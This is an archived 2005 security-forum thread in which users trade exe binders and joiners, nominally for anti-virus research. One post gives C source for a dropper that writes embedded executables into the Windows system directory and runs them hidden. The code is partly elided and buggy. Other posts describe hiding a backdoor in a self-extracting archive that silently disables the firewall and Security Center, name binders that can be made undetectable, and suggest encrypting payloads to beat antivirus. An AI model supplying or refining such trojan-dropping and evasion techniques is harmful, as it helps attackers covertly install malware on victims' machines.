Articles

Metasploit Framework Windows Tutorial
Remote Desktop Connection
Windows Processes That May Be Dangerous
How-To use NetCat a Tutorial
Common Linux Commands
Common Ports
Netcat Commands
HTTP Response Codes
War-Google Hack Terms
Wardriving
Avoiding Social Engineering and Phishing Attacks
Intrusion Detection on Linux
Linux Intrusion Detection
Penetration Testing Guide
Penetration Testing Tools
Social Engineering Fundamentals, Part I: Hacker Tactics
Social engineering (computer security)
The Psychology of Social Engineering

The Archives

General GSO
GovernmentSecurity.org News & Suggestions
In The News
Open Topic
General Security Information
Trash Can
Exploit & Vulnerability Mailing List Archives
Trial Member Forum
Product and Program Reviews GSO Tutorials
System Security
Windows Systems
Beginners Section
Linux & Unix Systems
File Downloads
Exploit Research & Discussion Trojan & Virus Errata
Networking Security / Firewall / IDS / VPN / Routers
System Hardening
E-Mail Security
Wifi Security
Trial Member Uploads
Upload discovered Trojans & Mal ware
GSO Programming Section
C , C++ , VC++
Visual Basic.NET
Perl /CGI
Java/Javascript
PHP/XML/ASP/HTML
Assembly + Other
The Cork Board
Network Security Consultant Directory
Network Security Jobs
The Archives
Encryption Information
General Network Security
Internet Anonymity
HTTP Protocol Security
Linux Security
MS IIS Information
Exploit Articles
Programming / Tool Design
GSO Software Projects
Public Downloads
Microsoft Security Questions and Papers
Help - Search - Member List - Calendar
GovernmentSecurity.org > System Security > Trojan & Virus Errata
sk3tch
Jun 13 2005, 07:31 PM
I'm onto phase two of my anti-virus research, this part involves exe binders/joiners - the apps that allow you to take, say, cmd.exe and join another executable to it so when someone clicks on cmd.exe, it also opens the other file.

Anyway, if you've clicked on the link hopefully you know what I'm talking about anyway. smile.gif

Please list the top binders/joiners that you like to use and/or links to top ones.

Thanks!
G777
Jun 13 2005, 09:30 PM
i dont use any but if i remember correctly fusion is quite good smile.gif
tibbar
Jun 14 2005, 01:58 AM
If I were an evil Virii maker, the only binder i would consider is one that will never be detected. So that would be a custom exe made as follows:

CODE

#include <stdio.h>
#include <stdlib.h>
#include <process.h>
#include <windows.h>

const unsigned char hex1[] = {
0x4D,0x5A,...,0x5A};
const unsigned char hex1[] = {
0x4D,0x5A,...,0x6A};
const unsigned int len1 = 65536;
const unsigned int len2 = 76636;

int main()
{
   HANDLE file;
   char sysdir[MAX_PATH];
   char newfile1[MAX_PATH];
   char newfile2[MAX_PATH];
   DWORD written;
   
   GetSystemDirectory(sysdir, MAX_PATH);
   sprintf(newfile1, "%s\\%s", sysdir, "newfile1.exe");
   sprintf(newfile2, "%s\\%s", sysdir, "newfile2.exe");
   
   file = CreateFile& #40;newfile1,GENERIC_WRITE,FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMA
L,0);
   WriteFile(file,hex1,len1,&written,0);
   CloseHandle(file);
   ShellExecute(0, "open",newfile1 ,NULL, NULL, SW_HIDE);
   
   file = CreateFile& #40;newfile2,GENERIC_WRITE,FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMA
L,0);
   WriteFile(file,hex2,len2,&written,0);
   CloseHandle(file);
   ShellExecute(0, "open",newfile1 ,NULL, NULL, SW_HIDE);
   
   ExitProcess(0);
   return 0;
}


I have no idea who originally came up with this, but credits to whoever that might be.
aelphaeis_mangarae
Jun 14 2005, 04:54 AM
Nice source tibbar (yes I know you didn't write i.)

I would have to agree the best binder you code is the one you code yourself, it is essential for a binder to be undetected.


Although if your talking about public binders, I would have to say Micro-Bind....well I think that's what it's called.

FBI Binder is also pretty good...
alibaba
Jun 14 2005, 09:58 AM
xp also comes with a binding tool: iexpress.exe
Partizaan
Jun 14 2005, 11:28 AM
iexpress.exe is a packer (self extracter) not a binder.
rageinc
Jun 15 2005, 02:01 AM
- What i do is make a winrar sfx. You put two files in it and also a batchfile that runs hidden (compiled with tebic). The after the batch is run it executes both and exits. You can also add other usefull things to the batch job like disabling the WinXp security Center and firewall, or kill a list of progs etc.. I also add a file called config.dat that just has the line:
CODE
add: none

Where it says none i can put the name of a .exe and add it to the sfx or leave it as none and let the backdoor run alone. You can also add pictures etc. I can post the script later if anyone is interested. Peace wink.gif
belgther
Jun 15 2005, 04:10 AM
BTW, tibbar's source can still be detected, because the EXE files are still kept. So the signatures can be detected, and a heuristic analyzing will also detect the malicious code ,too, since it's not packed at all.
PsyXhO
Jun 20 2005, 09:42 PM
I googled for fusion, fbi binder and micro-bind, but either found nothing or very old sites, with 404s at the end of a link.. Do you know the name of a binder that just binds two exe's into one? It doesn't matter if its detectable by an anti-virus, as I'm just simplifying something i use .bat's normally to do...
Thanks
sefe
Jun 20 2005, 10:46 PM
microjoiner is my fav, written in asm, easy to use, powerfull and i can make it undetectable tongue.gif
spikje
Jul 5 2005, 08:44 AM
The best and most complete binder available is hammer binder 3.
It can run hidden appz, melt after run, webdownload, edit registry and much much more wink.gif
tibbar
Jul 5 2005, 05:59 PM
QUOTE(belgther @ Jun 15 2005, 04:10 AM)
BTW, tibbar's source can still be detected, because the EXE files are still kept. So the signatures can be detected, and a heuristic analyzing will also detect the malicious code ,too, since it's not packed at all.
*



in theory you are right. in practice none of the AV on the market detect this technique.

besides u can always encrypt the binaries.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2005 Invision Power Services, Inc.